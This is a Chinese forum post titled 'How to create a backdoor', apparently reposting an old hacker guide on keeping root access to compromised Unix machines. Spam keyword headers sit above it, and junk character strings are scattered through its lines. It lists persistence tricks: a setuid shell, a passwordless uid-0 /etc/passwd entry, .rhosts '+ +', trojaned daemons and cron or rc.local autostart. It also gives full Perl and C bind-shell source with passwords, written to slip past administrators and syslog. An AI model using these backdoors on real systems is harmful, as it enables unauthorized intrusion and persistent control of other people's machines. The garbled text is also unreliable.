中文字幕精品亚洲无线码,99视频在线观看精品29,亚州十八禁免费不卡在线视颖,亚洲香蕉网久久综合影视

<sub id="xxpls"></sub><sub id="xxpls"></sub>

  • <listing id="xxpls"><u id="xxpls"></u></listing>
    <sub id="xxpls"></sub>

  • <sub id="xxpls"><ol id="xxpls"></ol></sub>
    <style id="xxpls"><u id="xxpls"></u></style>
  •  找回密碼
     注冊(cè)

    QQ登錄

    只需一步,快速開(kāi)始

    如何創(chuàng)建后門(mén)

    [復(fù)制鏈接]
    1#
    發(fā)表于 2011-1-13 17:04:25 | 只看該作者 |倒序?yàn)g覽 |閱讀模式
    參考文獻(xiàn):
    4 s6 f; d* D/ i( s7 ]# nArticle: backdoor from The Infinity Concept Issue II
    - \* n- L0 ^/ C3 I& ?Src: b4b0.c by b4b0
    - h+ `) t) A" J! RSrc: daemonsh.pl by van Hauser / [THC] in 1997' # V- ~" S" e7 K& j+ X5 G. e
    ! t. {5 h( p, d2 [; ^% h
    --   @2 e4 S: f9 Y) L& v% P
    8 l/ I, ?& f3 t1 I" t( ]3 q6 h
    千辛萬(wàn)苦(or 輕而易舉)的取得root后,當(dāng)然希望長(zhǎng)久的保持. 以被以后用來(lái)。。。d0ing what u want t0 d0 :) 傳統(tǒng)的方法就是建立一個(gè)后門(mén)(backd00r).即使入侵被發(fā)現(xiàn),好 的(先進(jìn))后門(mén)仍然能夠使你再次輕松的破門(mén)而入 -- 請(qǐng)記?。?" we come back and we are the h.a.c.k.e.r "
    4 ^0 Z. D2 A# b" r9 w# C  Y2 t& l--
    $ G; G9 z2 r' \8 B創(chuàng)建后門(mén)的方法如下:
    ( ?; v% y7 ]3 K7 X4 W- + F& o2 Q/ {3 ^/ v/ o' L$ }9 N
    1. setuid
    7 C  z1 u6 m6 }/ E, w#cp /bin/sh /tmp/.backdoor , \* W' D. h8 s9 K; V  n7 z
    #chmod u+s /tmp/.backdoor
    7 q6 I. q$ e$ P; }加上 suid 位到shell 上,最為簡(jiǎn)單方便,但也最為容易被ADM 發(fā)現(xiàn) find / -perm 4000 -print;同時(shí)在大多數(shù)的SUNOS 上 你會(huì)發(fā)現(xiàn)不能setuid。-- 適用于新手;
    ) ~3 C7 @8 i; F/ D0 e! V7 b-
    2 h  ^7 {5 e& z& e- u) ]9 X2. echo "zer9::0:0::/:/bin/csh" >> /etc/passwd 即給系統(tǒng)增加一個(gè) id 為 0(root)的帳號(hào),無(wú)口令; 也很容易被發(fā)現(xiàn)。 -- 適用于新手;
    ( [2 d8 Z0 a- A, C! f- * _5 o0 U7 y, Q9 Z: |' e4 e- B
    3.echo "+ zer9">>/.rhosts , e. Y* A) o. @( `& `* {# y
    即本地的名為 zer9 的用戶可以直接 rlogin target 無(wú)須口令此時(shí)的 zer9 就相當(dāng)于口令,不知道的人是不能進(jìn)去的. 6 r8 ]- Q# I5 W2 o
    前提是目標(biāo)的port 512or513or514 opening. - `: V9 p5 E4 f! X2 }
    注: 如 echo "+ +">>/.rhosts 則任何用戶都可rlogin至目標(biāo) 導(dǎo)致目標(biāo)門(mén)戶打開(kāi),最好不要;
    4 V" I, |2 l  R2 X5 j, X# h3 v1 d還可 echo "+ +">>/etc/hosts.equiv 但這樣不能取得root權(quán)限;-- 適用于比新手高一點(diǎn)點(diǎn),比中級(jí)水平低一點(diǎn)點(diǎn)的guys;
    ; z) z& K: B) b( A7 u, ?* V( S-
    ; S* h6 u3 l% `) O9 z& U5 B" i4.modify sendmail.cf 增加一個(gè)"wiz" 命令;
    4 ^* ^% H/ S* ?* L) n7 g# zusage: 9 S# A, o. A1 _. I# ^
    telnet target 25 [enter]
    8 O* h/ X; d5 m6 vwiz[enter]
    % {. ?) C. a0 M: w( m這是我從SAFEsuite中學(xué)到的(但沒(méi)試過(guò));比較危險(xiǎn)。因?yàn)閹缀跛械膾呙杵鞫紩?huì)刺探本漏洞。不過(guò)你可把命令本身該成其他不易猜到的名字。比較復(fù)雜,危險(xiǎn),但ADM不易發(fā)現(xiàn),隱蔽性較強(qiáng);你只在你的機(jī)器上試一試就okay了;-- 顧名思意,大師級(jí)漏洞; 2 G- ?7 f: k7 ~
    - 0 y2 y- S: f2 }1 P5 I
    5. crack suck as inetd,login,...
    0 |$ s& j  M; H  I. @6 K& Y即安裝它們的特絡(luò)繹版本。你需要找到各版本unix的rootkit;然后分別編譯即可;-- 如果目標(biāo)機(jī)上沒(méi)有安裝 tripwire之類(lèi)的東東,那幾乎不可能被發(fā)現(xiàn)。linux&sunos&freebsd的可能好找,但其他的了?即使你找到了,你有對(duì)應(yīng)平臺(tái)上的編譯器嗎?我有一臺(tái)運(yùn)行 slackware,one running irix,one runningsunos,one running hpux,one running digits unix,... 3 B* O0 `8 d! Q0 B0 c) b9 F4 \9 o( ?
    hahhahha,我又做夢(mèng)了:) : S# a* F7 Y. Z" C; }
    -- 我個(gè)人認(rèn)為是最好的方法,但實(shí)現(xiàn)起來(lái)有一定風(fēng)險(xiǎn),你必須考慮到如果你的木馬運(yùn)行出錯(cuò)怎么辦--因?yàn)槲覀兯龅囊磺卸急仨氁圆黄茐哪繕?biāo)機(jī)上的任何數(shù)據(jù)為原則;
    + t* ^: y2 L8 f- {' P, X8 ], |6 G: i' A0 f-
    8 p" p! x1 ^( h# X4 j8 Z6.ping rem0te backd00r * v! z$ {# ~% [: X1 Y) V
    即使是防火墻也很少阻止 ICMP 的通過(guò),因此本后門(mén)可繞過(guò)防火墻。具體的程序你可在 [THC] 的主頁(yè)發(fā)現(xiàn);我想到了另外一種直接用ping命令實(shí)現(xiàn)的可通過(guò)防火墻的方法 :一方在防火墻內(nèi),一方在防火墻外;除 ICMP 外;通向防火墻內(nèi)的信息均被過(guò)濾掉 :(用 60k data 代表長(zhǎng),10k data 代表短;使用摩爾思編碼;(或其他自定義編碼)雙方通過(guò) ICMPinfo 接受信息(ping 's data length);“嘀,嘀,嘀嘀,嘀,嘀嘀嘀...""長(zhǎng)江長(zhǎng)江,我是黃河--- 向我開(kāi)炮!向我開(kāi)炮”(^o^);以后有時(shí)間我會(huì)通過(guò)程序來(lái)實(shí)現(xiàn)驗(yàn)證可行性的。(技術(shù)上應(yīng)該沒(méi)有什么難度) 2 w$ W+ X# U' i0 a
    - , l# r( Y) e3 V& z
    7.rem0te shell 9 P5 J  `  W: r) J% y( p' q
    我最喜歡的方式。而且由于繞開(kāi)了login,故用 who 無(wú)法看到--也就是說(shuō),避開(kāi)了utmp&utmpx&wtmp&wtmpx;但沒(méi)有完全避開(kāi) syslogd.ADM仍可以在/var/log/messages中發(fā)現(xiàn)
    5 J0 K  ]9 V/ o5 \9 Q, z你。不過(guò),有一種方法可以徹底完全的旁路 syslogd!且聽(tīng)下面一一道來(lái).
    . ]( J3 ]; e# Y  H" o3 i  I% |bindshell的實(shí)現(xiàn)有兩種:
    : b6 h: G5 E& |( n1 j# ~; v+ }% P: Ha.
    0 x: V' X0 \( ]4 E替換掉 inetd.conf 中的不重要服務(wù),如 rlogind :)在inetd 接受 connect 請(qǐng)求后,直接在本端口利用 system("/bin/csh -i");直接spam 出一個(gè)shell,
    - _8 v4 R1 ~6 n! j: Ob. 接受 connect 后,在高端spam出一個(gè)shell; ) t  ]' g- g  r9 \9 R
    (更安全 :) . W5 M2 O; v" p3 P
    下面我給出一個(gè)perl 實(shí)現(xiàn)(不需socket libary支持)(pass on sunos5.5.1&slackware 2.0.33&irix6.4&hpux10.2)和一個(gè) gnuc 的實(shí)現(xiàn)(test on slackware 2.0.33&irix6.4) 3 f$ l' {2 x0 z* k  o" K% Q
    --- 0 K# Y  {4 c0 A& W/ A9 f
    perl 版安裝方法:
    " K& q( [* y, [! s' j( k: b###無(wú)須編譯??!只要目標(biāo)機(jī)上有perl支持就okay! 0 l, L  l$ |7 f, y2 o# L8 x& q# c
    如何判斷有無(wú)perl: $/>perl [enter]
    $ u* O) ]( i2 L& u# F% o: k# k, s
    [ctrl-c]
    " d7 Y. X, D) A6 O$/> ) O6 e/ `; G) M1 b7 c4 B
    -
    ( \" a% c: E7 e! [0 g- x2 U如果你對(duì) /etc/inetd.conf 中的內(nèi)容不是很熟的話,下面
    ( \0 @1 t1 N! a2 u9 v3 f" {的方法有很大的危險(xiǎn)性, exit(-1) please; 5 g+ m! v! O- H8 L, U" L
    -
    1 |4 L5 M6 [+ _! Q0 u首先將源程序cut,存為你想要替換的daemon,如in.rexecd or or in.rlogind ,in.pop2d....最好是已經(jīng)被ADM關(guān)掉了,而且不太引人注目的daemon,注意,一定要是 TCP types.然后
    " ]% T+ p: I/ smv /usr/sbin/in.rexecd /usr/sbin/in.rexecd.bak :))
    , z0 S, }2 G' Z0 m( i/ G/ zcp in.rexecd /usr/sbin/in.rexecd
    7 D: N% v- N/ s/ X0 M- ]% i然后 ps -aux|grep inetd;kill -HUP id(by inetd); 2 _( q" k& z/ y8 Q  `
    okay! 連 /etc/inetd.conf 都不要改。重申一點(diǎn):不論在任何情況下,我們都要盡最大的可能保護(hù)數(shù)據(jù)! 8 I. j6 _1 y' m; }& [
    - 1 O! ^9 J( j; ~: G. \, `
    Usage: nc target (such as 512)
    ( x( r, |# {3 s. Q. J7 i[enter] 4 _2 i: x: V5 M- U
    ur passwd [enter] : T4 k6 e" ^! Q+ q+ S- T
    (then u login in...:) 3 L! v# V: U8 l5 _. j# ]0 Z
    ' F! C' D, }; l
    ----Cut Here------------------------------------------
    8 v7 o4 `+ L1 U* d* E9 N9 K% O. D* x" _% D3 _; D% T
    #!/usr/bin/perl & y* j; I" W8 F/ a! v* ]( A7 K; s7 l
    #
    * U. x9 L/ }2 q' W) p: o; p# BEST 7 s* [) \6 k; F- D8 D' R
    # SIMPLE 5 e" S' V5 J* S* U
    # rem0te bind shell
    * H7 j* T5 c) S) r) i#[perl version only tcp]
    : w* `" ~6 u4 S# by , U" W. x0 H" c1 e- n( |
    # zer9[FTT]
    : d0 Y" S9 ]$ w! j- w8 m# zer9@21cn.com / `, Z9 T% U* [* u
    #passed on allmost unix   |; a& ~1 ?2 S: W% J! h8 S% i! D& j
    #greet to:van Hauser/[THC] 4 a1 y/ t1 t2 c* t* |8 |3 i/ X$ h5 m
    # for his daemonshell.pl 9 l( \5 u$ }/ k# M( G
    # 3 z3 O/ U0 l# F+ a
    $SHELL="/bin/csh -i";
    2 {+ t7 ?6 Y2 e1 c; }5 M5 [( h#d3f4ult p4sswd 1s "wh04r3u" (no quote);
    : F4 e' R$ Z! O  O- C$PASSWORD="BifqmATb6D5so"; 2 U2 y2 a3 W2 H$ I; d& Z
    + j5 p6 p3 z& g1 \- \
    if ($PASSWORD) { 2 n( U% x( E/ G: y( t- E
    chop($pass=);
    7 Y/ ^  h' d/ x8 o9 Q- g. {if (crypt($pass, $PASSWORD) ne $PASSWORD) { ) j9 W4 d/ k) F- N2 c* G, ]
    exit 0; 6 H9 e, r. g0 I1 m1 z
    }
    0 l1 _* G( [2 b6 C2 {/ i7 K" Aexec $SHELL ; . W, b' B; ?5 {( t$ z8 O" O
    exit 0;
    ) r/ D% D0 }5 B+ V} 2 ?# z: f4 Y/ P& T

    9 L( [$ k9 W6 i. {; [% L----Cut Here--------------------------------------------
    ! X" Y) M, H6 r! P- ]% j4 h7 j% k* ^" G% Y3 [

    - N/ r# n* K, H3 T2 `; y; f3 N6 \8 K% K
    4 I1 H' ~  ?' I. i: z
    下面是一個(gè)for gnuc 的bindshell,first cut it,save as " P2 K7 T1 j# f& R0 k  ^, V
    backdoor.c ,then cc backdoor.c -o backdoor : S. u, D( X8 s0 k& y
    other action just l1ke before;
    + P' r! K8 S7 r5 c: l, nUsage: (exp:binding to in.rlogind (513)) % f7 ?( i4 t8 j! L! _2 [! F
    nc target 513 //spam a shell on the high port;
    - D. E8 M+ I, {" U4 q' e. {nc target 54321
    ( h8 K# _4 D  K1 r8 `4 Kur passwd
    5 y0 N/ p4 i/ [2 M6 d, e(then u coming in...)   d! T; ^. R! f! {! i& Q! P" o! x' ~
    5 e- m7 z( y7 V' V
    ) q3 i; B9 I7 @
    ----Cut Here------------------------------------- , m# t+ x/ [) V) ]
    $ D( R+ o2 c* W$ ~; o. O
    /*
    , L0 l% f# A) C! J) ~* [ b i n d - s h e l l ]
    6 o0 Y4 Y4 i+ w( Z& p' ?7 U" |* by
    ! j  K' v8 k2 F* zer9[FTT] ) k% E! G1 [% Z, b1 ], ^
    * zer9@21cn.com & o) g  ]9 d7 U7 l7 M+ ?) h) h4 `/ w
    *test on slackware 2.0.33&irix6.4(cc) ( j7 W2 v/ t3 |0 G7 R* w# |' V
    *cc backdoor.c -o backdoor
    ( p7 T8 c1 b# N# @: B*u c4n p01nt t0 wh1ch p0rt th3 sh3ll t0 sp4m , @: G+ O2 j3 f
    *c0mm4nd l1n3: backdoor [port] ) J  [# w9 g3 m& e! V3 O7 i0 j: C: q
    *d3fault p0rt 1s: 54321 . T3 M4 A/ D: S2 z+ W
    *greets to b4b0 for his b4b0.c
    ' [! t7 I& I: \. b; d* I0 D9 p9 K*m4yb3 1 c0uld s4y: 4 _- v) T6 N. g- G  J2 ~
    *"0k,b4b0.l1st3n c4r3fully;" " {$ ]: N5 k! N& w& s" t4 }
    *s0rry,just a joke. 3 b& F  |( R! M4 [
    *
    * H2 l; ]: `6 e8 |*/ & s8 J  e) a: m; }- I7 J

    4 W+ b. T  b, A+ i% `$ p5 m2 Y! A8 z4 S#include / N3 a* K9 I7 J
    #include 3 B) _- {5 c& m
    #include
    0 I4 b" U. Q% Y$ x% r$ H' X! X% f#include
    3 J- `, |/ Z8 F- y5 ?) v#include ! x1 c7 L" V' v" k8 b0 x7 e3 C
    #include
    5 U2 s3 p" F5 P8 k. O0 f#include
    + z) o( ~. T- }* N1 ~; z; @! |) `
    0 `5 O4 n+ c) o: ?+ e6 k" l( m, J& R1 z( Q! I5 y
    #define PassWord "k1n90fth3w0rld" - _+ l% c" @! W7 e8 _- P* |0 ~* @$ ~
    /* u c4n us3 crypt l1b4ry t0 sh4d0w 1t */ / H% X0 T7 p; t4 f4 h

    ; H: B/ h/ `# r. O$ f5 _6 t#define DefaultPort 54321
    ) o) g/ I! X+ v, y/* d3f4ult b1nd1ng p0rt */
    + [/ w' J1 G% w# C, e9 e4 F- k( Q1 l  S9 f. s0 k
    int main(int argc,char **argv)
    - p! y* X! t1 d% S1 j{
    / j6 {* }5 w4 Q" L4 u  v' J5 j# ]int s,in_s;
    ) ^8 ^1 L' M6 r; ~8 T" J4 n: Vstruct sockaddr_in server,client;
    8 @4 R* e* B$ t& g  `# m1 }& ?/ Q6 ~int client_len,bindport;
    ! q  c1 x* [* @/ G+ gchar recvbuf[1000];
    : l' f7 U, C# R& Q  U3 x# T) h5 f) o5 v1 q
    if(argc!=2) bindport=DefaultPort;
    ; Q' ~8 n$ d( eelse + u: F3 i( N* C1 G$ }! l
    bindport=atoi(argv[1]);
    5 j" q4 S* J0 H! P. O0 r0 Nif((s=socket(AF_INET,SOCK_STREAM,0))<0) 1 @: p7 c* P3 [3 x7 j- q
    {
    ) G$ v8 ?( P: ], O( ]# h0 Aperror("socket");
    6 I) y. }" y# N' o6 Oreturn -1;
    2 S: K5 L9 o! |% ]$ Y}
    , v, U0 g) Z  J' h, w+ a5 Pbzero((char *)&server,sizeof(server));
    5 s8 V* A9 q3 t* J: c( }: nbzero((char *)&client,sizeof(client)); . H4 z* F+ D3 V" A1 ?, s# l
    bzero(recvbuf,sizeof(recvbuf));
    $ Y1 q  L# D( l. zserver.sin_family=AF_INET; & M) W5 d; z( S3 M3 l
    server.sin_port=htons(bindport); ( O9 q& _; ?2 @" T8 @
    server.sin_addr.s_addr=INADDR_ANY;
    # w! k' y  c- t1 A0 P  H- mif(bind(s,(struct sockaddr *)&server,sizeof(server))<0) 2 [6 ^; `2 e4 r% h( }6 p, E
    { - b4 U  `$ H9 Y* F8 I( s7 c9 c' v
    perror("bind"); 7 b6 r. r6 O! B3 p4 J$ S% z
    return -1; 8 Q6 ?3 I# o+ ]1 m0 s0 s, r; V
    }
    ( w  n/ u5 m- [8 c2 b4 F5 Sif(listen(s,3)!=0)   E# `1 [  z6 [6 m) F
    {
    7 t1 ^; N  Y% {& g6 Z# Z4 S: ?0 |perror("listen"); 8 l7 p0 P4 U1 |# }0 }8 ^1 i6 q
    return -1; 5 ]+ X0 e" [8 d+ K9 p2 \0 Z
    } # l: U  P, J4 p  a! Q
    client_len=sizeof(client);
    . f9 M; x3 G/ U( n8 y9 wif((in_s=accept(s,(struct sockaddr *)&client,&client_len))<0)
    2 |2 ]  `0 ?3 p4 @+ Y/ v) l( B{
    2 l: R( l' U, `+ _4 @perror("accept"); , \7 Z7 \3 E2 K( R  _+ W- k
    return -1; , _4 F+ b- H3 v) |: z, l
    }
    1 I- ^) K0 K1 S7 wrecv(in_s,recvbuf,sizeof(recvbuf),0); * c- V! a  {; c+ y
    sleep(1); # ?  B1 f0 d$ }& G9 l' D
    if((strlen(recvbuf)-1)==strlen(PassWord)) 4 m2 |9 b2 ~0 A+ O% c* E0 [
    if(!strncmp(recvbuf,PassWord,strlen(PassWord))) 6 }& R& T: k/ g
    {
    2 P" _- K; B& a9 |" }& _0 Esend(in_s,"0k4y! c0m1ng 1n...\n",25,0); 0 {- g  E8 E9 l% p. q$ B$ b. R) v
    close(0);close(1);close(2);   S& [& l9 u; D- u3 q) T- I0 z
    dup2(in_s,0);dup2(in_s,1);dup2(in_s,2); 4 ^0 @3 J5 I$ _+ O
    execl("/bin/csh","/bin/csh",(char *)0); / U0 j. M, _; ~5 y) z
    }
    7 `6 s" ?. [- B4 J. u6 l6 g: hclose(s);
    # _; P$ H7 S- c0 Aclose(in_s); . p8 s! l, _! M% v% ~
    return 0; 8 b5 [3 H& |, ^- H  j9 |
    } 8 u' l% H  Y" J! ]$ R2 v* Y
    5 ~/ I# p3 z- x
    ----Cut Here------------------------------------------------- & O1 Q' n- u5 E! y  j+ K+ _
    # a7 H4 l( E( _9 R5 u9 U4 O
    用上面的方法都不能完全的避開(kāi)syslogd,因?yàn)樗麄兌际怯蒳netd 啟動(dòng)的,inetd啟動(dòng)它們的同時(shí)已經(jīng)進(jìn)行l(wèi)og 了;旁路掉inetd就能完全避開(kāi)syslog!方法很簡(jiǎn)單,只要直接在命令行直接啟動(dòng)例程2(c)就可以了,(1perl不行);不過(guò)這樣很麻煩;一旦ADM關(guān)掉計(jì)算機(jī)就玩完了;比較好的方法是在 /etc/rc.d/rc.local中加入: 2 w6 Q4 m2 q' V7 X
    backdoor &   g) h' k" G2 d  D1 ~% I2 o
    但即使這樣作了,每次用過(guò)后還要再起動(dòng)一次;更好的方法是寫(xiě)一個(gè)具有完全功能(后門(mén)功能^o^)的daemon,徹底的解決這個(gè)問(wèn)題;但這樣做與hack inetd 那樣更有效率(安全)了?
    - v6 Z4 q1 w0 _2 o  S7 L3 p" d--
    2 ~0 x, k- W9 u: t- ]8.第八種武器就是 crontab
    3 X  ~: v# g1 C9 D0 q我只知道原理,沒(méi)實(shí)踐過(guò).每到一定時(shí)間就往 /etc/passwd 中加入一條uid為0(root)
    3 q& g  E! A4 y; ]( e; L. B的用戶;時(shí)間一道就delete ,或創(chuàng)建suid's shell...在序言中提到的文章中有詳細(xì)介紹; 6 z: F8 v" U4 M: q3 t
    -- 9 b& m( b7 B7 o& \1 {% F+ Q0 i
    9.有沒(méi)有想過(guò)只要向系統(tǒng)的一個(gè)用戶發(fā)一個(gè)email,OS 就會(huì)spam出一個(gè)shell?利用用戶的home目錄下的 .forward 可作到這一點(diǎn)。 6 J8 J% R) W# B
    -- # P3 u4 G/ y1 \  V$ j
    10。修改內(nèi)核--超級(jí)高手的做法;2.2.0的解壓文件達(dá)到了50幾MB,看到就頭痛。接著就 jmp ffff0 :) (不是看到內(nèi)容,而是看到大?。?[THC]最近出了篇文章關(guān)于這個(gè)的。你對(duì)自己有信心的話可以看看;
    / Z2 S8 _+ w* h- b0 i  n--
    & o& w' {7 v$ d8 V; ^11.還有就是利用 overflow 程序,雖然我們一般是利用它取得root;但只要 ADM && u 沒(méi)有 patch ,始終我們可以利用它的,與suid不同的是它不怕被 find / -perm 4000 發(fā)現(xiàn);一般只有 tripwire可發(fā)現(xiàn)。 * k7 n2 k! v2 M, M$ |

    5 V% b! `0 Q1 x+ x: J* ~
    您需要登錄后才可以回帖 登錄 | 注冊(cè)

    本版積分規(guī)則

    QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號(hào)-1 )

    GMT+8, 2025-8-12 08:56

    Powered by Discuz! X3.5

    © 2001-2025 Discuz! Team.

    快速回復(fù) 返回頂部 返回列表